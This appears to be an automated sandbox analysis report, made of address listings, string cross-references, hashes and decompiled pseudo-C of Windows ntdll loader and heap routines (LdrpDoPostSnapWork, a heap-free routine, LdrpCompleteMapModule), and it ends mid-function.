                                                                                                                          0x00a29c5b
                                                                                                                          0x00a29cac
                                                                                                                          0x00a29cc0
                                                                                                                          0x00a29cc0
                                                                                                                          0x00a29c55
                                                                                                                          0x009d8927
                                                                                                                          0x009d8927
                                                                                                                          0x009d892f
                                                                                                                          0x009d8933
                                                                                                                          0x00000000
                                                                                                                          0x009d88f5
                                                                                                                          0x009d88f5
                                                                                                                          0x00000000
                                                                                                                          0x009d88f7
                                                                                                                          0x009d88f7
                                                                                                                          0x009d88fa
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x009d88fa
                                                                                                                          0x009d88f5
                                                                                                                          0x009d88f3
                                                                                                                          0x00000000
                                                                                                                          0x009d88d5
                                                                                                                          0x00000000
                                                                                                                          0x009d88b2
                                                                                                                          0x009d88c9
                                                                                                                          0x00000000
                                                                                                                          0x009d88c9
                                                                                                                          0x009d887f
                                                                                                                          0x009d886a
                                                                                                                          0x009d8857
                                                                                                                          0x009d8852
                                                                                                                          0x009d88bf
                                                                                                                          0x009d88bf
                                                                                                                          0x009d87aa
                                                                                                                          0x009d87ad
                                                                                                                          0x009d87ae
                                                                                                                          0x009d87b4
                                                                                                                          0x009d87b5
                                                                                                                          0x009d87b6
                                                                                                                          0x009d87b8
                                                                                                                          0x009d87bd
                                                                                                                          0x009d87c1
                                                                                                                          0x009d87f4
                                                                                                                          0x009d87fa
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x009d87c1
                                                                                                                          0x00000000

                                                                                                                          Strings
                                                                                                                          • LdrpDoPostSnapWork, xrefs: 00A29C1E
                                                                                                                          • LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 00A29C18
                                                                                                                          • minkernel\ntdll\ldrsnap.c, xrefs: 00A29C28
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
                                                                                                                          • API String ID: 2994545307-1948996284
                                                                                                                          • Opcode ID: f0eb616ac58bb0cd06a7fbee6a7606b7569f999533805751f255f1986f00d45a
                                                                                                                          • Instruction ID: ff64d95942546073ef6e5607660c4046cd0571a22c8c8cfc59004c3746b95507
                                                                                                                          • Opcode Fuzzy Hash: f0eb616ac58bb0cd06a7fbee6a7606b7569f999533805751f255f1986f00d45a
                                                                                                                          • Instruction Fuzzy Hash: 6991F371A4021AAFDF18DF59C881ABB77B9FF84310B54816AE915AB352DF30ED01DB90
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 009FAC7B, Relevance: 4.0, Strings: 3, Instructions: 205COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 80%
                                                                                                                          			E009FAC7B(void* __ecx, signed short* __edx) {
				signed int _v8;
				signed int _v12;
				void* __ebx;
				signed char _t75;
				signed int _t79;
				signed int _t88;
				intOrPtr _t89;
				signed int _t96;
				signed char* _t97;
				intOrPtr _t98;
				signed int _t101;
				signed char* _t102;
				intOrPtr _t103;
				signed int _t105;
				signed char* _t106;
				signed int _t131;
				signed int _t138;
				void* _t149;
				signed short* _t150;

				_t150 = __edx;
				_t149 = __ecx;
				_t70 =  *__edx & 0x0000ffff;
				__edx[1] = __edx[1] & 0x000000f8;
				__edx[3] = 0;
				_v8 =  *__edx & 0x0000ffff;
				if(( *(__ecx + 0x40) & 0x00000040) != 0) {
					_t39 =  &(_t150[8]); // 0x8
					E00A1D5E0(_t39, _t70 * 8 - 0x10, 0xfeeefeee);
					__edx[1] = __edx[1] | 0x00000004;
				}
				_t75 =  *(_t149 + 0xcc) ^  *0xab8a68;
				if(_t75 != 0) {
					L4:
					if( *((intOrPtr*)(_t149 + 0x4c)) != 0) {
						_t150[1] = _t150[0] ^ _t150[1] ^  *_t150;
						_t79 =  *(_t149 + 0x50);
						 *_t150 =  *_t150 ^ _t79;
						return _t79;
					}
					return _t75;
				} else {
					_t9 =  &(_t150[0x80f]); // 0x1017
					_t138 = _t9 & 0xfffff000;
					_t10 =  &(_t150[0x14]); // 0x20
					_v12 = _t138;
					if(_t138 == _t10) {
						_t138 = _t138 + 0x1000;
						_v12 = _t138;
					}
					_t75 = _t150 + (( *_t150 & 0x0000ffff) + 0xfffffffe) * 0x00000008 & 0xfffff000;
					if(_t75 > _t138) {
						_v8 = _t75 - _t138;
						_push(0x4000);
						_push( &_v8);
						_push( &_v12);
						_push(0xffffffff);
						_t131 = E00A096E0();
						__eflags = _t131 - 0xc0000045;
						if(_t131 == 0xc0000045) {
							_t88 = E00A73C60(_v12, _v8);
							__eflags = _t88;
							if(_t88 != 0) {
								_push(0x4000);
								_push( &_v8);
								_push( &_v12);
								_push(0xffffffff);
								_t131 = E00A096E0();
							}
						}
						_t89 =  *[fs:0x30];
						__eflags = _t131;
						if(_t131 < 0) {
							__eflags =  *(_t89 + 0xc);
							if( *(_t89 + 0xc) == 0) {
								_push("HEAP: ");
								E009CB150();
							} else {
								E009CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push(_v8);
							_push(_v12);
							_push(_t149);
							_t75 = E009CB150("RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)\n", _t131);
							goto L4;
						} else {
							_t96 =  *(_t89 + 0x50);
							_t132 = 0x7ffe0380;
							__eflags = _t96;
							if(_t96 != 0) {
								__eflags =  *_t96;
								if( *_t96 == 0) {
									goto L10;
								}
								_t97 =  *( *[fs:0x30] + 0x50) + 0x226;
								L11:
								__eflags =  *_t97;
								if( *_t97 != 0) {
									_t98 =  *[fs:0x30];
									__eflags =  *(_t98 + 0x240) & 0x00000001;
									if(( *(_t98 + 0x240) & 0x00000001) != 0) {
										E00A814FB(_t132, _t149, _v12, _v8, 7);
									}
								}
								 *((intOrPtr*)(_t149 + 0x234)) =  *((intOrPtr*)(_t149 + 0x234)) + _v8;
								 *((intOrPtr*)(_t149 + 0x210)) =  *((intOrPtr*)(_t149 + 0x210)) + 1;
								 *((intOrPtr*)(_t149 + 0x230)) =  *((intOrPtr*)(_t149 + 0x230)) + 1;
								 *((intOrPtr*)(_t149 + 0x220)) =  *((intOrPtr*)(_t149 + 0x220)) + 1;
								_t101 =  *( *[fs:0x30] + 0x50);
								__eflags = _t101;
								if(_t101 != 0) {
									__eflags =  *_t101;
									if( *_t101 == 0) {
										goto L13;
									}
									_t102 =  *( *[fs:0x30] + 0x50) + 0x226;
									goto L14;
								} else {
									L13:
									_t102 = _t132;
									L14:
									__eflags =  *_t102;
									if( *_t102 != 0) {
										_t103 =  *[fs:0x30];
										__eflags =  *(_t103 + 0x240) & 0x00000001;
										if(( *(_t103 + 0x240) & 0x00000001) != 0) {
											__eflags = E009E7D50();
											if(__eflags != 0) {
												_t132 =  *( *[fs:0x30] + 0x50) + 0x226;
												__eflags =  *( *[fs:0x30] + 0x50) + 0x226;
											}
											E00A81411(_t132, _t149, _v12, __eflags, _v8,  *(_t149 + 0x74) << 3, 0, 0,  *_t132 & 0x000000ff);
										}
									}
									_t133 = 0x7ffe038a;
									_t105 =  *( *[fs:0x30] + 0x50);
									__eflags = _t105;
									if(_t105 != 0) {
										__eflags =  *_t105;
										if( *_t105 == 0) {
											goto L16;
										}
										_t106 =  *( *[fs:0x30] + 0x50) + 0x230;
										goto L17;
									} else {
										L16:
										_t106 = _t133;
										L17:
										__eflags =  *_t106;
										if( *_t106 != 0) {
											__eflags = E009E7D50();
											if(__eflags != 0) {
												_t133 =  *( *[fs:0x30] + 0x50) + 0x230;
												__eflags =  *( *[fs:0x30] + 0x50) + 0x230;
											}
											E00A81411(_t133, _t149, _v12, __eflags, _v8,  *(_t149 + 0x74) << 3, 0, 0,  *_t133 & 0x000000ff);
										}
										_t75 = _t150[1] & 0x00000013 | 0x00000008;
										_t150[1] = _t75;
										goto L4;
									}
								}
							}
							L10:
							_t97 = _t132;
							goto L11;
						}
					} else {
						goto L4;
					}
				}
			}






















                                                                                                                          0x009fac85
                                                                                                                          0x009fac88
                                                                                                                          0x009fac8a
                                                                                                                          0x009fac8d
                                                                                                                          0x009fac91
                                                                                                                          0x009fac99
                                                                                                                          0x009fac9c
                                                                                                                          0x00a39f57
                                                                                                                          0x00a39f5b
                                                                                                                          0x00a39f60
                                                                                                                          0x00a39f60
                                                                                                                          0x009faca8
                                                                                                                          0x009facae
                                                                                                                          0x009facda
                                                                                                                          0x009facde
                                                                                                                          0x009face8
                                                                                                                          0x009faceb
                                                                                                                          0x009facee
                                                                                                                          0x00000000
                                                                                                                          0x009facee
                                                                                                                          0x009facf6
                                                                                                                          0x009facb0
                                                                                                                          0x009facb0
                                                                                                                          0x009facbb
                                                                                                                          0x009facbd
                                                                                                                          0x009facc0
                                                                                                                          0x009facc5
                                                                                                                          0x009fadae
                                                                                                                          0x009fadb4
                                                                                                                          0x009fadb4
                                                                                                                          0x009facd4
                                                                                                                          0x009facd8
                                                                                                                          0x009facf9
                                                                                                                          0x009facff
                                                                                                                          0x009fad04
                                                                                                                          0x009fad08
                                                                                                                          0x009fad09
                                                                                                                          0x009fad10
                                                                                                                          0x009fad12
                                                                                                                          0x009fad18
                                                                                                                          0x00a39f6f
                                                                                                                          0x00a39f74
                                                                                                                          0x00a39f76
                                                                                                                          0x00a39f7c
                                                                                                                          0x00a39f84
                                                                                                                          0x00a39f88
                                                                                                                          0x00a39f89
                                                                                                                          0x00a39f90
                                                                                                                          0x00a39f90
                                                                                                                          0x00a39f76
                                                                                                                          0x009fad1e
                                                                                                                          0x009fad24
                                                                                                                          0x009fad26
                                                                                                                          0x00a3a097
                                                                                                                          0x00a3a09b
                                                                                                                          0x00a3a0ba
                                                                                                                          0x00a3a0bf
                                                                                                                          0x00a3a09d
                                                                                                                          0x00a3a0b2
                                                                                                                          0x00a3a0b7
                                                                                                                          0x00a3a0c5
                                                                                                                          0x00a3a0c8
                                                                                                                          0x00a3a0cb
                                                                                                                          0x00a3a0d2
                                                                                                                          0x00000000
                                                                                                                          0x009fad2c
                                                                                                                          0x009fad2c
                                                                                                                          0x009fad2f
                                                                                                                          0x009fad34
                                                                                                                          0x009fad36
                                                                                                                          0x00a39f97
                                                                                                                          0x00a39f9a
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00a39fa9
                                                                                                                          0x009fad3e
                                                                                                                          0x009fad3e
                                                                                                                          0x009fad41
                                                                                                                          0x00a39fb3
                                                                                                                          0x00a39fb9
                                                                                                                          0x00a39fc0
                                                                                                                          0x00a39fd0
                                                                                                                          0x00a39fd0
                                                                                                                          0x00a39fc0
                                                                                                                          0x009fad4a
                                                                                                                          0x009fad50
                                                                                                                          0x009fad5c
                                                                                                                          0x009fad62
                                                                                                                          0x009fad68
                                                                                                                          0x009fad6b
                                                                                                                          0x009fad6d
                                                                                                                          0x00a39fda
                                                                                                                          0x00a39fdd
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00a39fec
                                                                                                                          0x00000000
                                                                                                                          0x009fad73
                                                                                                                          0x009fad73
                                                                                                                          0x009fad73
                                                                                                                          0x009fad75
                                                                                                                          0x009fad75
                                                                                                                          0x009fad78
                                                                                                                          0x00a39ff6
                                                                                                                          0x00a39ffc
                                                                                                                          0x00a3a003
                                                                                                                          0x00a3a00e
                                                                                                                          0x00a3a010
                                                                                                                          0x00a3a01b
                                                                                                                          0x00a3a01b
                                                                                                                          0x00a3a01b
                                                                                                                          0x00a3a038
                                                                                                                          0x00a3a038
                                                                                                                          0x00a3a003
                                                                                                                          0x009fad84
                                                                                                                          0x009fad89
                                                                                                                          0x009fad8c
                                                                                                                          0x009fad8e
                                                                                                                          0x00a3a042
                                                                                                                          0x00a3a045
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00a3a054
                                                                                                                          0x00000000
                                                                                                                          0x009fad94
                                                                                                                          0x009fad94
                                                                                                                          0x009fad94
                                                                                                                          0x009fad96
                                                                                                                          0x009fad96
                                                                                                                          0x009fad99
                                                                                                                          0x00a3a063
                                                                                                                          0x00a3a065
                                                                                                                          0x00a3a070
                                                                                                                          0x00a3a070
                                                                                                                          0x00a3a070
                                                                                                                          0x00a3a08d
                                                                                                                          0x00a3a08d
                                                                                                                          0x009fada4
                                                                                                                          0x009fada6
                                                                                                                          0x00000000
                                                                                                                          0x009fada6
                                                                                                                          0x009fad8e
                                                                                                                          0x009fad6d
                                                                                                                          0x009fad3c
                                                                                                                          0x009fad3c
                                                                                                                          0x00000000
                                                                                                                          0x009fad3c
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x009facd8

                                                                                                                          Strings
                                                                                                                          • HEAP[%wZ]: , xrefs: 00A3A0AD
                                                                                                                          • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 00A3A0CD
                                                                                                                          • HEAP: , xrefs: 00A3A0BA
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                                                                                                          • API String ID: 0-1340214556
                                                                                                                          • Opcode ID: 75ddb737a088608c9fb625f4f93540500b38ddb0573b58f33a0cf56cad02e0bf
                                                                                                                          • Instruction ID: c82692b0698af904c92d97ff1615411edfd6e9ac9e19febf8584f2019d0f4482
                                                                                                                          • Opcode Fuzzy Hash: 75ddb737a088608c9fb625f4f93540500b38ddb0573b58f33a0cf56cad02e0bf
                                                                                                                          • Instruction Fuzzy Hash: 02812371204688EFD726CB68C985BBAB7F8FF05300F1445A5F69587692D378ED40CB12
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 009EB73D, Relevance: 3.9, Strings: 3, Instructions: 190COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 74%
                                                                                                                          			E009EB73D(void* __ecx, signed int __edx, intOrPtr* _a4, unsigned int _a8, intOrPtr _a12, signed int* _a16) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __ebp;
				void* _t72;
				char _t76;
				signed char _t77;
				intOrPtr* _t80;
				unsigned int _t85;
				signed int* _t86;
				signed int _t88;
				signed char _t89;
				intOrPtr _t90;
				intOrPtr _t101;
				intOrPtr* _t111;
				void* _t117;
				intOrPtr* _t118;
				signed int _t120;
				signed char _t121;
				intOrPtr* _t123;
				signed int _t126;
				intOrPtr _t136;
				signed int _t139;
				void* _t140;
				signed int _t141;
				void* _t147;

				_t111 = _a4;
				_t140 = __ecx;
				_v8 = __edx;
				_t3 = _t111 + 0x18; // 0x0
				 *((intOrPtr*)(_t111 + 0x10)) = _t3;
				_t5 = _t111 - 8; // -32
				_t141 = _t5;
				 *(_t111 + 0x14) = _a8;
				_t72 = 4;
				 *(_t141 + 2) = 1;
				 *_t141 = _t72;
				 *((char*)(_t141 + 7)) = 3;
				_t134 =  *((intOrPtr*)(__edx + 0x18));
				if( *((intOrPtr*)(__edx + 0x18)) != __edx) {
					_t76 = (_t141 - __edx >> 0x10) + 1;
					_v12 = _t76;
					__eflags = _t76 - 0xfe;
					if(_t76 >= 0xfe) {
						_push(__edx);
						_push(0);
						E00A8A80D(_t134, 3, _t141, __edx);
						_t76 = _v12;
					}
				} else {
					_t76 = 0;
				}
				 *((char*)(_t141 + 6)) = _t76;
				if( *0xab8748 >= 1) {
					__eflags = _a12 - _t141;
					if(_a12 <= _t141) {
						goto L4;
					}
					_t101 =  *[fs:0x30];
					__eflags =  *(_t101 + 0xc);
					if( *(_t101 + 0xc) == 0) {
						_push("HEAP: ");
						E009CB150();
					} else {
						E009CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push("((PHEAP_ENTRY)LastKnownEntry <= Entry)");
					E009CB150();
					__eflags =  *0xab7bc8;
					if(__eflags == 0) {
						E00A82073(_t111, 1, _t140, __eflags);
					}
					goto L3;
				} else {
					L3:
					_t147 = _a12 - _t141;
					L4:
					if(_t147 != 0) {
						 *((short*)(_t141 + 4)) =  *((intOrPtr*)(_t140 + 0x54));
					}
					if( *((intOrPtr*)(_t140 + 0x4c)) != 0) {
						 *(_t141 + 3) =  *(_t141 + 1) ^  *(_t141 + 2) ^  *_t141;
						 *_t141 =  *_t141 ^  *(_t140 + 0x50);
					}
					_t135 =  *(_t111 + 0x14);
					if( *(_t111 + 0x14) == 0) {
						L12:
						_t77 =  *((intOrPtr*)(_t141 + 6));
						if(_t77 != 0) {
							_t117 = (_t141 & 0xffff0000) - ((_t77 & 0x000000ff) << 0x10) + 0x10000;
						} else {
							_t117 = _t140;
						}
						_t118 = _t117 + 0x38;
						_t26 = _t111 + 8; // -16
						_t80 = _t26;
						_t136 =  *_t118;
						if( *((intOrPtr*)(_t136 + 4)) != _t118) {
							_push(_t118);
							_push(0);
							E00A8A80D(0, 0xd, _t118,  *((intOrPtr*)(_t136 + 4)));
						} else {
							 *_t80 = _t136;
							 *((intOrPtr*)(_t80 + 4)) = _t118;
							 *((intOrPtr*)(_t136 + 4)) = _t80;
							 *_t118 = _t80;
						}
						_t120 = _v8;
						 *((intOrPtr*)(_t120 + 0x30)) =  *((intOrPtr*)(_t120 + 0x30)) + 1;
						 *((intOrPtr*)(_t120 + 0x2c)) =  *((intOrPtr*)(_t120 + 0x2c)) + ( *(_t111 + 0x14) >> 0xc);
						 *((intOrPtr*)(_t140 + 0x1e8)) =  *((intOrPtr*)(_t140 + 0x1e8)) -  *(_t111 + 0x14);
						 *((intOrPtr*)(_t140 + 0x1f8)) =  *((intOrPtr*)(_t140 + 0x1f8)) + 1;
						if( *((intOrPtr*)(_t140 + 0x1f8)) > 0xa) {
							__eflags =  *(_t140 + 0xb8);
							if( *(_t140 + 0xb8) == 0) {
								_t88 =  *(_t140 + 0x40) & 0x00000003;
								__eflags = _t88 - 2;
								_t121 = _t120 & 0xffffff00 | _t88 == 0x00000002;
								__eflags =  *0xab8720 & 0x00000001;
								_t89 = _t88 & 0xffffff00 | ( *0xab8720 & 0x00000001) == 0x00000000;
								__eflags = _t89 & _t121;
								if((_t89 & _t121) != 0) {
									 *(_t140 + 0x48) =  *(_t140 + 0x48) | 0x10000000;
								}
							}
						}
						_t85 =  *(_t111 + 0x14);
						if(_t85 >= 0x7f000) {
							 *((intOrPtr*)(_t140 + 0x1ec)) =  *((intOrPtr*)(_t140 + 0x1ec)) + _t85;
						}
						_t86 = _a16;
						 *_t86 = _t141 - _a12 >> 3;
						return _t86;
					} else {
						_t90 = E009EB8E4(_t135);
						_t123 =  *((intOrPtr*)(_t90 + 4));
						if( *_t123 != _t90) {
							_push(_t123);
							_push( *_t123);
							E00A8A80D(0, 0xd, _t90, 0);
						} else {
							 *_t111 = _t90;
							 *((intOrPtr*)(_t111 + 4)) = _t123;
							 *_t123 = _t111;
							 *((intOrPtr*)(_t90 + 4)) = _t111;
						}
						_t139 =  *(_t140 + 0xb8);
						if(_t139 != 0) {
							_t93 =  *(_t111 + 0x14) >> 0xc;
							__eflags = _t93;
							while(1) {
								__eflags = _t93 -  *((intOrPtr*)(_t139 + 4));
								if(_t93 <  *((intOrPtr*)(_t139 + 4))) {
									break;
								}
								_t126 =  *_t139;
								__eflags = _t126;
								if(_t126 != 0) {
									_t139 = _t126;
									continue;
								}
								_t93 =  *((intOrPtr*)(_t139 + 4)) - 1;
								__eflags =  *((intOrPtr*)(_t139 + 4)) - 1;
								break;
							}
							E009EE4A0(_t140, _t139, 0, _t111, _t93,  *(_t111 + 0x14));
						}
						goto L12;
					}
				}
			}






























                                                                                                                          0x009eb746
                                                                                                                          0x009eb74b
                                                                                                                          0x009eb74d
                                                                                                                          0x009eb750
                                                                                                                          0x009eb755
                                                                                                                          0x009eb758
                                                                                                                          0x009eb758
                                                                                                                          0x009eb75e
                                                                                                                          0x009eb763
                                                                                                                          0x009eb764
                                                                                                                          0x009eb76a
                                                                                                                          0x009eb76d
                                                                                                                          0x009eb771
                                                                                                                          0x009eb776
                                                                                                                          0x009eb85c
                                                                                                                          0x009eb85d
                                                                                                                          0x009eb860
                                                                                                                          0x009eb865
                                                                                                                          0x00a32ba1
                                                                                                                          0x00a32ba2
                                                                                                                          0x00a32ba9
                                                                                                                          0x00a32bae
                                                                                                                          0x00a32bae
                                                                                                                          0x009eb77c
                                                                                                                          0x009eb77c
                                                                                                                          0x009eb77c
                                                                                                                          0x009eb785
                                                                                                                          0x009eb788
                                                                                                                          0x00a32bb6
                                                                                                                          0x00a32bb9
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00a32bbf
                                                                                                                          0x00a32bc5
                                                                                                                          0x00a32bc9
                                                                                                                          0x00a32be8
                                                                                                                          0x00a32bed
                                                                                                                          0x00a32bcb
                                                                                                                          0x00a32be0
                                                                                                                          0x00a32be5
                                                                                                                          0x00a32bf3
                                                                                                                          0x00a32bf8
                                                                                                                          0x00a32bfd
                                                                                                                          0x00a32c05
                                                                                                                          0x00a32c0e
                                                                                                                          0x00a32c0e
                                                                                                                          0x00000000
                                                                                                                          0x009eb78e
                                                                                                                          0x009eb78e
                                                                                                                          0x009eb78e
                                                                                                                          0x009eb791
                                                                                                                          0x009eb791
                                                                                                                          0x009eb797
                                                                                                                          0x009eb797
                                                                                                                          0x009eb79f
                                                                                                                          0x009eb7a9
                                                                                                                          0x009eb7af
                                                                                                                          0x009eb7af
                                                                                                                          0x009eb7b1
                                                                                                                          0x009eb7b6
                                                                                                                          0x009eb7e2
                                                                                                                          0x009eb7e2
                                                                                                                          0x009eb7e7
                                                                                                                          0x009eb880
                                                                                                                          0x009eb7ed
                                                                                                                          0x009eb7ed
                                                                                                                          0x009eb7ed
                                                                                                                          0x009eb7ef
                                                                                                                          0x009eb7f2
                                                                                                                          0x009eb7f2
                                                                                                                          0x009eb7f5
                                                                                                                          0x009eb7fa
                                                                                                                          0x00a32c2d
                                                                                                                          0x00a32c2e
                                                                                                                          0x00a32c39
                                                                                                                          0x009eb800
                                                                                                                          0x009eb800
                                                                                                                          0x009eb802
                                                                                                                          0x009eb805
                                                                                                                          0x009eb808
                                                                                                                          0x009eb808
                                                                                                                          0x009eb80a
                                                                                                                          0x009eb80d
                                                                                                                          0x009eb816
                                                                                                                          0x009eb81c
                                                                                                                          0x009eb822
                                                                                                                          0x009eb82f
                                                                                                                          0x009eb88b
                                                                                                                          0x009eb892
                                                                                                                          0x009eb897
                                                                                                                          0x009eb899
                                                                                                                          0x009eb89b
                                                                                                                          0x009eb89e
                                                                                                                          0x009eb8a5
                                                                                                                          0x009eb8a8
                                                                                                                          0x009eb8aa
                                                                                                                          0x009eb8ac
                                                                                                                          0x009eb8ac
                                                                                                                          0x009eb8aa
                                                                                                                          0x009eb892
                                                                                                                          0x009eb831
                                                                                                                          0x009eb839
                                                                                                                          0x009eb83b
                                                                                                                          0x009eb83b
                                                                                                                          0x009eb844
                                                                                                                          0x009eb84b
                                                                                                                          0x009eb852
                                                                                                                          0x009eb7b8
                                                                                                                          0x009eb7ba
                                                                                                                          0x009eb7bf
                                                                                                                          0x009eb7c4
                                                                                                                          0x00a32c18
                                                                                                                          0x00a32c19
                                                                                                                          0x00a32c23
                                                                                                                          0x009eb7ca
                                                                                                                          0x009eb7ca
                                                                                                                          0x009eb7cc
                                                                                                                          0x009eb7cf
                                                                                                                          0x009eb7d1
                                                                                                                          0x009eb7d1
                                                                                                                          0x009eb7d4
                                                                                                                          0x009eb7dc
                                                                                                                          0x009eb8bb
                                                                                                                          0x009eb8bb
                                                                                                                          0x009eb8be
                                                                                                                          0x009eb8be
                                                                                                                          0x009eb8c1
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x009eb8c3
                                                                                                                          0x009eb8c5
                                                                                                                          0x009eb8c7
                                                                                                                          0x009eb8e0
                                                                                                                          0x00000000
                                                                                                                          0x009eb8e0
                                                                                                                          0x009eb8cc
                                                                                                                          0x009eb8cc
                                                                                                                          0x00000000
                                                                                                                          0x009eb8cc
                                                                                                                          0x009eb8d6
                                                                                                                          0x009eb8d6
                                                                                                                          0x00000000
                                                                                                                          0x009eb7dc
                                                                                                                          0x009eb7b6

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                                                                          • API String ID: 0-1334570610
                                                                                                                          • Opcode ID: d6255171cc7416db0044d678f7ee30969839a690b16abb2a1a121455cb99cde2
                                                                                                                          • Instruction ID: 1d0760293c25e56039f1f89c3ce80183057f88fee0482cfd7970523145ca54b6
                                                                                                                          • Opcode Fuzzy Hash: d6255171cc7416db0044d678f7ee30969839a690b16abb2a1a121455cb99cde2
                                                                                                                          • Instruction Fuzzy Hash: 9961AF70600281DFDB1ADF29C485B6ABBE9FF44304F24856EE8498B752D735EC81CB91
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 009D7E41, Relevance: 3.9, Strings: 3, Instructions: 174COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 98%
                                                                                                                          			E009D7E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				signed int _t73;
				void* _t77;
				char* _t82;
				char* _t87;
				signed char* _t97;
				signed char _t102;
				intOrPtr _t107;
				signed char* _t108;
				intOrPtr _t112;
				intOrPtr _t124;
				intOrPtr _t125;
				intOrPtr _t126;

				_t107 = __edx;
				_v12 = __ecx;
				_t125 =  *((intOrPtr*)(__ecx + 0x20));
				_t124 = 0;
				_v20 = __edx;
				if(E009DCEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
					_t112 = _v8;
				} else {
					_t112 = 0;
					_v8 = 0;
				}
				if(_t112 != 0) {
					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
						_t124 = 0xc000007b;
						goto L8;
					}
					_t73 =  *(_t125 + 0x34) | 0x00400000;
					 *(_t125 + 0x34) = _t73;
					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
						goto L3;
					}
					 *(_t125 + 0x34) = _t73 | 0x01000000;
					_t124 = E009CC9A4( *((intOrPtr*)(_t125 + 0x18)));
					if(_t124 < 0) {
						goto L8;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
						L8:
						return _t124;
					}
					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
							goto L5;
						}
						_t102 =  *0xab5780; // 0x0
						if((_t102 & 0x00000003) != 0) {
							E00A45510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
							_t102 =  *0xab5780; // 0x0
						}
						if((_t102 & 0x00000010) != 0) {
							asm("int3");
						}
						_t124 = 0xc0000428;
						goto L8;
					}
					L5:
					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
						goto L8;
					}
					_t77 = _a4 - 0x40000003;
					if(_t77 == 0 || _t77 == 0x33) {
						_v16 =  *((intOrPtr*)(_t125 + 0x18));
						if(E009E7D50() != 0) {
							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						} else {
							_t82 = 0x7ffe0384;
						}
						_t108 = 0x7ffe0385;
						if( *_t82 != 0) {
							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E009E7D50() == 0) {
									_t97 = 0x7ffe0385;
								} else {
									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t97 & 0x00000020) != 0) {
									E00A47016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
						}
						if(_a4 != 0x40000003) {
							L14:
							_t126 =  *((intOrPtr*)(_t125 + 0x18));
							if(E009E7D50() != 0) {
								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							} else {
								_t87 = 0x7ffe0384;
							}
							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E009E7D50() != 0) {
									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t108 & 0x00000020) != 0) {
									E00A47016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
							goto L8;
						} else {
							_v16 = _t125 + 0x24;
							_t124 = E009FA1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
